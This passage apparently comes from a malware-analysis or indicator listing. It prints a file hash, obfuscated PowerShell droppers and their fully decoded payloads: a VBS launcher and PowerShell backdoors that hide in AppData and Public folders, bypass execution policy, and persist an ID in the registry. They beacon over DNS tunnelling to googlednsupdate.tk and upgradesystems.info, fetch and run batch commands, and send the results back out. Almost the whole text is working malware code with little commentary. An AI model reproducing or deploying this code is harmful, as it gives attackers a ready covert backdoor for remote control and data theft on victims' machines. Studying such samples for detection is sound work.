CeXRlc1szXSAtbmUgJEdsb2JhbDpob3N0TGVuKSkNCiAgICB7DQogICAgICAgICRHbG9iYWw6aG9zdExlbiA9IDEwIA0KICAgICAgICANCiAgICB9DQogICAgd2hpbGUgKCRHbG9iYWw6cmVnRXhpc3QgLWd0IDApDQogICAgew0KICAgICAgICAkcmV0ID0gZG93bmlwIDENCiAgICAgICAgDQogICAgICAgICRHbG9iYWw6cmVnRXhpc3QgPSAkR2xvYmFsOnJlZ0V4aXN0IC0gMQ0KICAgIH0NCiAgICB3aGlsZSAoJEdsb2JhbDpiYXRFeGlzdCAtZ3QgMCkNCiAgICB7DQogICAgICAgICRmaWxlbmFtZSA9ICIiDQogICAgICAgICRmaWxlbmFtZSA9IGRvd25pcCAwIA0KICAgICAgICANCiAgICAgICAgaWYgKCRmaWxlbmFtZSAtbmUgIiIpDQogICAgICAgIHsNCiAgICAgICAgICAgICRiYXRjaEZpbGVQYXRoID0gJEdsb2JhbDpkRm9sZCArICJcIiArICRmaWxlbmFtZQ0KICAgICAgICAgICAgDQogICAgICAgICAgICBSZW5hbWUtSXRlbSAkYmF0Y2hGaWxlUGF0aAkoJGJhdGNoRmlsZVBhdGgrIi5iYXQiKQ0KCQkgICAgJGJhdGNoRmlsZVBhdGggPSAkYmF0Y2hGaWxlUGF0aCsiLmJhdCINCiAgICAgICAgICAgICRyZXN1bHRGaWxlUGF0aCA9ICRnbG9iYWw6dUZvbGQgKyAnXCcgKyAkZmlsZW5hbWUNCiAgICAgICAgICAgIA0KICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gKCgkYmF0Y2hGaWxlUGF0aCAtcmVwbGFjZSAnICcsICdgICcpICsgJyA+ICcgKyAoJHJlc3VsdEZpbGVQYXRoIC1yZXBsYWNlICcgJywgJ2AgJykpOw0KICAgICAgICAgICAgZGVsICgkYmF0Y2hGaWxlUGF0aCkNCiAgICAgICAgICAgICRHbG9iYWw6YmF0RXhpc3QgPSAkR2xvYmFsOmJhdEV4aXN0IC0xIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICB9DQogICAgfQ0KICAgIEdldC1DaGlsZEl0ZW0gJGdsb2JhbDp1Rm9sZCAtZm9yY2UgfCAgICUgew0KICAgICAgICAkXy5GdWxsTmFtZSANCiAgICAgICAgJF8uTmFtZSANCiAgICAgICAgbW92ZSAkXy5GdWxsTmFtZSAoJEdsb2JhbDp0Rm9sZCArICJcIiArICRfLk5hbWUpDQogICAgICAgIHVwaXAgKCRfLk5hbWUpDQogICAgfQ0KfQ0KY2F0Y2gNCnsNCiAgICAkaG9zdG5hbWUgPSAiRSIgKyAkR2xvYmFsOklEICsgKC1qb2luICgoNjUuLjkwKSArICg0OC4uNTcpICsgKDk3Li4xMjIpfCBHZXQtUmFuZG9tIC1Db3VudCAyIHwgJSB7W2NoYXJdJF99KSkgKyhbc3RyaW5nXSRfLkludm9jYXRpb25JbmZvLlNjcmlwdExpbmVOdW1iZXIpICsgIi4iICsgJEdsb2JhbDpkb21haW4gDQogICAgDQogICAgW1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkaG9zdG5hbWUpICAgIA0KfQ==')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' $fdn; } "  -->  +++ Set wss = CreateObject("wScript.Shell")HOME = "%userprofile%\AppData\Local\Microsoft\Media\"dnsCmd = "powershell -executionpolicy bypass -file " & HOME & "dn.ps1"wss.Run dnsCmd,0 +++ $scriptdir = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition$Global:domain = "googlednsupdate.tk"$Global:ID = "A1"$Global:dFold = $scriptdir + "\dn"$Global:uFold = $scriptdir + "\up"$Global:tFold = $scriptdir + "\te"$Global:hostLen = 10$Global:regExist = 0$Global:batExist = 0ipconfig /flushdnsFunction IIf($If, $Right, $Wrong) {If ($If) {$Right} Else {$Wrong}}function DNSRequest{    param( [string]$hostname )    $Stoploop = $false    [int]$Retrycount = "0"    $ret = [System.Net.IPAddress[]]("0.0.0.0")    $success = $false    do{        try{            $ret = [System.Net.IPAddress[]][System.Net.Dns]::GetHostAddresses($hostname)            $Stoploop = $true            $success = $true        }        catch{            $success = $false            if ($Retrycount -gt 20){                                $Stoploop = $true                throw            }            else {                            Start-Sleep -Seconds 2                $Retrycount = $Retrycount + 1            }        }    }    while($Stoploop -eq $false)    return $ret}function downip{ param( [int]$type ) $finished = 0 $filename = "" $fileID = 0 $reqStr = "IF"   $hostname = $reqStr[$type] + $Global:ID + (-join ((65..90) + (48..57) + (97..122) | Get-Random -Count 2 | % {[char]$_})) + "." + $Global:domain  $ipAddy = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()    if (($ipAddy[0] -eq $ipAddy[1]) -and ($ipAddy[0] -eq 63)) {        $fileID = [char]$ipAddy[2] + [char]$ipAddy[3]            $finishedFileName = [int]0    $namePart = [int]0    while($finishedFileName -eq 0){        $hostname = "P" + $fileID + [string]$namePart +  (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + "."  + $Global:domain                $ipFileNameAddr = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if ($ipFileNameAddr[0] -eq 68)        {               if (($ipFileNameAddr[1] -eq 127) -or ($ipFileNameAddr[2] -eq 127) -or ($ipFileNameAddr[3] -eq 127)){                $finishedFileName = [int]1             }                                        $filename = $filename + (IIf ($ipFileNameAddr[1] -ne 127) ([char]$ipFileNameAddr[1]) "") + (IIf ($ipFileNameAddr[2] -ne 127) ([char]$ipFileNameAddr[2]) "") + (IIf ($ipFileNameAddr[3] -ne 127) ([char]$ipFileNameAddr[3]) "")            $namepart = [int]$namePart + [int]1        }            }            $finishedData = [int]0    $fsize = [int]0    $tempFilePath =  ($Global:tFold) + "\" + $filename        while($finishedData -eq 0){                $fileHdl = [io.file]::Open($tempFilePath,"Append");        $hostname = "D" + $fileID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + (([string](mybase32UInt32 (Get-Item $tempFilePath).length)).Remove(0,2).Remove(5,1))  + "." + $Global:domain         ([System.Net.IPAddress[]](DNSRequest $hostname)).GetEnumerator()| Sort-Object address | foreach{                                    if ([int]$_.GetAddressBytes()[0] -gt 130)            {                $sequenceIndex = [int]$_.GetAddressBytes()[0] - 240                                 if ([int]$_.GetAddressBytes()[1] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[1])                                    }                if ([int]$_.GetAddressBytes()[2] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[2])                }                if ([int]$_.GetAddressBytes()[3] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[3])                }                if ([int]$_.GetAddressBytes()[3] -eq 127){                     $finishedData = 1                }                                            }        }        $fileHdl.Close()    }        $b64Data = [System.IO.File]::ReadAllBytes($tempFilePath)    $data = [System.Convert]::FromBase64CharArray($b64Data,0,$b64Data.Length)     $filePath =  ($Global:dFold) + "\" + $filename    [io.file]::WriteAllBytes($filePath,$data)    del $tempFilePath    return $filename }  return $filename}function upip{    param( [string]$fname )        $filePath = ($Global:tFold) + "\" + $fname    $success = 0        $hostname = "Y" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))+ $fname.Replace(".","")  + "." + $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (($respBytes[0] -eq $respBytes[1]) -and ($respBytes[0] -eq [byte]74))    {        $uploadID = [char]$respBytes[2] + [char]$respBytes[3]                        $uploadedCompleteSize = [uint32]0        $fileData = (get-content $filePath -encoding byte)        $base32filedata = (base32data $fileData)        while($uploadedCompleteSize -lt $base32filedata.length)        {                                    $hostname = "Q" + $uploadID + ([string](mybase32UInt32 $uploadedCompleteSize)).Remove(0,2).Remove(5,1) + (-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize + $Global:hostLen-8)]) + "." + $Global:domain                                     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                        if ([int]$respBytes[0] -eq 75)            {                $uploadedCompleteSize = [uint32]($respBytes[3]+$respBytes[2]*100+$respBytes[1]*10000)                                            }                            }                $hostname = "Z" + $uploadID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." + $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 76) -and ([int]$respBytes[1] -eq 76) -and ([int]$respBytes[2] -eq 76) -and ([int]$respBytes[3] -eq 76))        {            del $filePath            return "OK"        }    }}function myToUint64{    param( [byte[]]$data )          $retUint = [uint64]0    $powCount = [int]0    for($len=($data.Length-1); $len -ge 0; $len--)    {        $retUint = $retUint + $data[$len] * [Math]::Pow(16,$powCount)        $powCount = $powCount + 2;            }        return $retUint}function base32data{    param( [byte[]]$data )        $ret = ""    if ($data.Length -eq 0) { return ret}    $charmap = "abcdefghijklmnopqrstuvwxyz012345"                for ($fiveByteIndex = 0;$fiveByteIndex -lt  [Math]::Ceiling($data.Length/5); $fiveByteIndex++) #    {                $bytes = [byte[]]$data[($fiveByteIndex * 5)..(IIF ($fiveByteIndex -lt ($data.Length/5)) (($fiveByteIndex*5)+4)  ($data.Length-1))]                        $number =  myToUint64 $bytes                $paddingBitRequire = (5 - (($bytes.Length * 8) % 5)) % 5         $outputB32Len = ($bytes.Length*8 + $paddingBitRequire)/5                for ($powIndex = ($bytes.Length*8 - 1) ; $powIndex -ge 4; $powIndex = $powIndex - 5)        {                     $ret = $ret + $charmap[[Math]::Pow(2,(-1 * $powIndex + 4))*($number -band [uint64]([Math]::Pow(2,$powIndex) + [Math]::Pow(2,$powIndex-1) + [Math]::Pow(2,$powIndex-2) + [Math]::Pow(2,$powIndex-3) + [Math]::Pow(2,$powIndex-4)))]                                       }                if ($powIndex -ge 0)         {                        switch ($powIndex)            {                0 {$ret = $ret + $charmap[$number -band [uint64](1)] + "6"}                1 {$ret = $ret + $charmap[$number -band [uint64](3)] + "7"}                2 {$ret = $ret + $charmap[$number -band [uint64](7)] + "8"}                3 {$ret = $ret + $charmap[$number -band [uint64](15)]+ "9"}            }         }                  }    return $ret        }function mybase32UInt32{    param([uint32]$inputnumber)    $ret = ""    $bytes = ([bitconverter]::GetBytes($inputnumber))    [array]::Reverse($bytes)    return (base32data $bytes)}Try{    if(-not(Test-Path -Path ($global:uFold))){        mkdir $global:uFold    }    if(-not (Test-Path -Path ($global:dFold))){        mkdir $global:dFold    }    if(-not (Test-Path -Path ($global:tFold))){        mkdir $global:tFold    }        if ((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID  -ErrorAction SilentlyContinue) -ne $null)    {        $Global:ID = ([string]((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID).ID)).Substring(0,2)            }        if ($Global:ID -eq "A1")    {        $hostname = "N" + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 5 | % {[char]$_}))  + "." + $Global:domain                 $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 61) -and ([int]$respBytes[1] -eq 61))        {            $Global:ID = [char]$respBytes[2] + [char]$respBytes[3]            New-ItemProperty -Path "HKCU:\Software\Microsoft\FTP" -Name "ID" -Value $Global:ID -PropertyType String -Force                    }    }        $hostname = "C" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." + $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                    if (([int]$respBytes[0] -eq 62))    {        $Global:regExist = $respBytes[1]        $Global:batExist = $respBytes[2]        $Global:hostLen  = $respBytes[3]            }        $hostname = "T" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count ($Global:hostLen-3) | % {[char]$_}))  + "." + $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (([int]$respBytes[0] -ne 65) -or ([int]$respBytes[1] -ne 65) -or ([int]$respBytes[2] -ne 65) -or ([int]$respBytes[3] -ne $Global:hostLen))    {        $Global:hostLen = 10             }    while ($Global:regExist -gt 0)    {        $ret = downip 1                $Global:regExist = $Global:regExist - 1    }    while ($Global:batExist -gt 0)    {        $filename = ""        $filename = downip 0                 if ($filename -ne "")        {            $batchFilePath = $Global:dFold + "\" + $filename                        Rename-Item $batchFilePath    ($batchFilePath+".bat")            $batchFilePath = $batchFilePath+".bat"            $resultFilePath = $global:uFold + '\' + $filename                        Invoke-Expression (($batchFilePath -replace ' ', '` ') + ' > ' + ($resultFilePath -replace ' ', '` '));            del ($batchFilePath)            $Global:batExist = $Global:batExist -1                         }    }    Get-ChildItem $global:uFold -force |   % {        $_.FullName         $_.Name         move $_.FullName ($Global:tFold + "\" + $_.Name)        upip ($_.Name)    }}catch{    $hostname = "E" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) +([string]$_.InvocationInfo.ScriptLineNumber) + "." + $Global:domain         [System.Net.Dns]::GetHostAddresses($hostname)    }
  7. 293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb
  8. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXCINClNFUlZFUj0iaHR0cDovL3VwZ3JhZGVzeXN0ZW1zLmluZm8vdXBncmFkZS1pbmRleC5hc3B4P3JlcT1fX1wiDQpEd249InBvd2Vyc2hlbGwgIiImeyR3Yz0obmV3LW9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCk7JHdjLlVzZURlZmF1bHRDcmVkZW50aWFscz0kdHJ1ZTskd2MuSGVhZGVycy5hZGQoJ0FjY2VwdCcsJyovKicpOyR3Yy5IZWFkZXJzLmFkZCgnVXNlci1BZ2VudCcsJ01pY3Jvc29mdCBCSVRTLzcuNycpO3doaWxlKDEpe3RyeXskcj1HZXQtUmFuZG9tOyR3Yy5Eb3dubG9hZEZpbGUoJyImU0VSVkVSJiItXyZtPWQnLCciJkhPTUUmImRuXCcrJHIrJy4tXycpO1NldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSkpKSAtRW5jb2RpbmcgQnl0ZTskY2Q9JHdjLlJlc3BvbnNlSGVhZGVyc1snQ29udGVudC1EaXNwb3NpdGlvbiddO1JlbmFtZS1JdGVtIC1wYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtbmV3bmFtZSAoJGNkLlN1YnN0cmluZygkY2QuSW5kZXhPZignZmlsZW5hbWU9JykrOSkpfWNhdGNoe2JyZWFrfX19IiIiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gUmVwbGFjZShEd24sIi1fIiwiZHduIiksMA0KRG93bmxvYWRFeGVjdXRlPSJwb3dlcnNoZWxsICIiJnskd2M9KG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpOyR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHM9JHRydWU7JHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTskd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTskcj1HZXQtUmFuZG9tOyR3Yy5Eb3dubG9hZEZpbGUoJyImU0VSVkVSJiItXyZtPWQnLCciJkhPTUUmImRuXCcrJHIrJy4tXycpO1NldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICgnIiZIT01FJiJkblwnKyRyKycuLV8nKSkpKSAtRW5jb2RpbmcgQnl0ZTtJbnZva2UtRXhwcmVzc2lvbiAoJyImSE9NRSYiZG5cJyskcisnLi1fID4iJkhPTUUmInVwXCcrJHIrJy1fJyk7JGNkPSR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXTtSZW5hbWUtSXRlbSAtcGF0aCAoJyImSE9NRSYidXBcJyskcisnLV8nKSAtbmV3bmFtZSAoJGNkLlN1YnN0cmluZygoJGNkLkluZGV4T2YoJ2ZpbGVuYW1lPScpKzkpLCgkY2QuTGVuZ3RoLTI1KSkrJy5iYXQudHh0Jyk7R2V0LUNoaWxkSXRlbSAiJkhPTUUmInVwXCB8IEZvckVhY2gtT2JqZWN0IHtpZigoR2V0LUl0ZW0gKCRfLkZ1bGxOYW1lKSkubGVuZ3RoIC1ndCAwKXtbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygoW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRfLkZ1bGxOYW1lKSkpIHwgT3V0LUZpbGUgJF8uRnVsbE5hbWU7JHdjLlVwbG9hZEZpbGUoJyImU0VSVkVSJiJ1cGwmbT11JywkXy5GdWxsTmFtZSk7d2FpdGZvciBoYWhhIC9UIDN9O1JlbW92ZS1JdGVtICRfLkZ1bGxOYW1lfTtSZW1vdmUtSXRlbSAoJyImSE9NRSYiZG5cJyskcisnLi1fJyl9IiIiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gUmVwbGFjZShEb3dubG9hZEV4ZWN1dGUsIi1fIiwiYmF0IiksMA0KRG5zQ21kPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICImSE9NRSYiZmlyZWV5ZS5wczEiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gRG5zQ21kLDA=')); Set-Content 'C:\Users\Public\Libraries\fireeye.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLnVwZ3JhZGVzeXN0ZW1zLmluZm8nCiRnbG9iYWw6ZmlsZW5hbWUgPSAnJwokZ2xvYmFsOm15ZmxhZyA9IDAKJGdsb2JhbDpteWlkID0gJyMjIycKJGdsb2JhbDpteWhvbWUgPSAiJGVudjpQdWJsaWNcTGlicmFyaWVzXCIKZnVuY3Rpb24gY29udmVydFRvLUJhc2UzNiAoJGRlY051bT0iIikKewogICAgJGRlY051bSAlPSA0NjY1NgogICAgJGFscGhhYmV0ID0gIjAxMjM0NTY3ODlBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWiIKICAgIGRvCiAgICB7CiAgICAgICAgJHJlbWFpbmRlciA9ICgkZGVjTnVtICUgMzYpCiAgICAgICAgJGNoYXIgPSAkYWxwaGFiZXQuc3Vic3RyaW5nKCRyZW1haW5kZXIsMSkKICAgICAgICAkYmFzZTM2TnVtID0gIiRjaGFyJGJhc2UzNk51bSIKICAgICAgICAkZGVjTnVtID0gKCRkZWNOdW0gLSAkcmVtYWluZGVyKSAvIDM2CiAgICB9CiAgICB3aGlsZSAoJGRlY051bSAtZ3QgMCkKICAgICRiYXNlMzZOdW0uUGFkTGVmdCgzLCcwJykKfQpmdW5jdGlvbiBHZXRTdWIoJG15ZmxhZzIsICRjbWRpZD0nMDAnLCAkcGFydGlkPScwMDAnKQp7CiAgICBpZigkbXlmbGFnMiAtZXEgMCkKICAgIHsKICAgICgnd3cwMDAwMDAnKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KICAgIGVsc2VpZigkbXlmbGFnMiAtZXEgMSkKICAgIHsKICAgICAgICAoJ3d3JyskZ2xvYmFsOm15aWQrJzAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpCiAgICB9CiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDIpCiAgICB7CiAgICAgICAgKCd3dycrJGdsb2JhbDpteWlkKyRjbWRpZCskcGFydGlkKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KfQpmdW5jdGlvbiBTdHIySGV4KCRteXN0cikKewogICAgW1N5c3RlbS5CaXRDb252ZXJ0ZXJdOjpUb1N0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpEZWZhdWx0LkdldEJ5dGVzKCRteXN0cikpLlJlcGxhY2UoIi0iLCAiIikKfQpmdW5jdGlvbiBBbGl2ZQp7CglpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQoJewoJCXJldHVybiAwCgl9CiAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAxKSsnMzAnKQogICAgJHN1YiA9ICgoR2V0U3ViIDEpKycyMzJBJykgKyAoU3RyMkhleCAkZ2xvYmFsOmZpbGVuYW1lKQogICAgJGkgPSAxCiAgICAkcmV0ID0gMAogICAgd2hpbGUoJGdsb2JhbDpteWZsYWcgLWVxIDEpCiAgICB7CiAgICAgICAgJHJldCA9IDEKICAgICAgICAkc3ViMiA9ICRzdWIgKyAoU3RyMkhleCAkaSkKICAgICAgICBTZW5kUmVjZWl2ZUROUyAkc3ViMgogICAgICAgICRpKysKICAgIH0KICAgIGlmKCRyZXQgLWVxIDEpCiAgICB7CiAgICAgICAgRml4QmF0RmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIpCiAgICB9CiAgICAkcmV0Cn0KZnVuY3Rpb24gU2VuZFJlY2VpdmVETlMgKCRkKQp7CgkkY250ID0gMAoJd2hpbGUgKCRjbnQgLWx0IDIwKQoJewoJCXRyeQoJCXsKCQkJJG15ZGF0YSA9IChbU3lzdGVtLk5ldC5ETlNdOjpHZXRIb3N0QnlOYW1lKCRkKyRnbG9iYWw6bXlob3N0KS5BZGRyZXNzTGlzdFswXSkKCQkJJG15ZGF0YSA9ICgkbXlkYXRhIHwgRm9yRWFjaC1PYmplY3QgeyRfLklQQWRkcmVzc1RvU3RyaW5nfSkKCQkJJGNudCA9IDI1CgkJfQoJCWNhdGNoCgkJewoJCQlTdGFydC1TbGVlcCAtbSA1MDAKCQkJJGNudCsrCgkJfQoJfQogICAgaWYoLW5vdCgkY250IC1lcSAyNSkpCiAgICB7CiAgICAgICAgKCcjJysnIyMnKQogICAgfQogICAgZWxzZWlmKCRnbG9iYWw6bXlmbGFnIC1lcSAwIC1hbmQgJG15ZGF0YS5TdGFydHNXaXRoKCczMy4zMy4nKSkKICAgIHsKICAgICAgICAkdG1wID0gJG15ZGF0YS5TdWJTdHJpbmcoNikuU3BsaXQoJy4nKQogICAgICAgICRnbG9iYWw6ZmlsZW5hbWUgPSAoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMQogICAgfQogICAgZWxzZWlmICgkbXlkYXRhLkVxdWFscygnMzUuMzUuMzUuMzUnKSkKICAgIHsKICAgICAgICAkZ2xvYmFsOm15ZmxhZyA9IDAKICAgIH0KICAgIGVsc2VpZiAoJGdsb2JhbDpteWZsYWcgLWVxIDEpCiAgICB7CiAgICAgICAgJHRtcCA9ICRteWRhdGEuU3BsaXQoJy4nKQogICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIsICgoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKSArIChbY2hhcl0gW2ludF0gJHRtcFsyXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbM10pKSkKICAgIH0KICAgIGVsc2VpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQogICAgewogICAgICAgIChbY2hhcl0gW2ludF0gJG15ZGF0YS5TcGxpdCgnLicpWzBdKQogICAgfQp9CmZ1bmN0aW9uIEZpeEJhdEZpbGUgKCRiYXRwYXRoKQp7CiAgICAoR2V0LUNvbnRlbnQgJGJhdHBhdGgpLlN1YnN0cmluZygxMCkgfCBTZXQtQ29udGVudCAkYmF0cGF0aAp9CmZ1bmN0aW9uIFNlbmRGaWxlKCRteUZpbGVQYXRoKQp7CiAgICAkbXlGaWxlTmFtZSA9IFtTeXN0ZW0uSU8uUGF0aF06OkdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbigkbXlGaWxlUGF0aCkKICAgICRteXN0ciA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxUZXh0KCRteUZpbGVQYXRoKQogICAgJGk9MAogICAgJG15dGVtcCA9ICcnCiAgICAkaj0wCiAgICB3aGlsZSgkaSAtbGUgJG15c3RyLkxlbmd0aCkKICAgIHsKICAgICAgICAkbXl0ZW1wICs9ICRteXN0clskaV0KICAgICAgICBpZigoKCRpJTI0KSAtZXEgMjMpIC1vciAoJGkgLWVxICRteXN0ci5MZW5ndGgpKQogICAgICAgIHsKICAgICAgICAgICAgJG15aGV4ID0gU3RyMkhleCAkbXl0ZW1wCiAgICAgICAgICAgIFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDIgJG15RmlsZU5hbWUgKGNvbnZlcnRUby1CYXNlMzYgJGopKSArICRteWhleCkKICAgICAgICAgICAgJGorKwogICAgICAgICAgICAkbXl0ZW1wID0gJycKICAgICAgICB9CiAgICAgICAgJGkrKwogICAgfQp9CmZ1bmN0aW9uIEdldElECnsKICAgICRnbG9iYWw6bXlpZCA9IFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDApKyczMCcpCn0KZnVuY3Rpb24gQ2hhbmdlVGhpc0ZpbGUgKCRib3RpZCkKewoJKEdldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xmaXJlZXllLnBzMSkgLXJlcGxhY2UgKCcjJysnIyMnKSwkYm90aWQgfCBTZXQtQ29udGVudCAkZW52OlB1YmxpY1xMaWJyYXJpZXNcZmlyZWV5ZS5wczEKfQpmdW5jdGlvbiBJbml0CnsKICAgIGlmKCRnbG9iYWw6bXlpZCAtZXEgKCcjJysnIyMnKSkKICAgIHsKCQltZCAtRm9yY2UgKCRnbG9iYWw6bXlob21lKyd0cFwnKQoJCUdldElECgkJQ2hhbmdlVGhpc0ZpbGUgJGdsb2JhbDpteWlkCiAgICB9Cn0KZnVuY3Rpb24gbWFpbgp7CiAgICBJbml0CiAgICBpZihBbGl2ZSAtZXEgMSkKICAgIHsKICAgICAgICBJbnZva2UtRXhwcmVzc2lvbiAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLmJhdCA+ICcrJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICAgICAgU2VuZEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0JykKICAgICAgICBSZW1vdmUtSXRlbSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICB9Cn0KbWFpbg==')); Set-Content 'C:\Users\Public\Libraries\fireeye.ps1' $f;(Get-Content $env:Public\Libraries\fireeye.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\fireeye.vbs}" -->  +++ HOME="%public%\Libraries\"SERVER="http://upgradesystems.info/upgrade-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("WScript.Shell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname 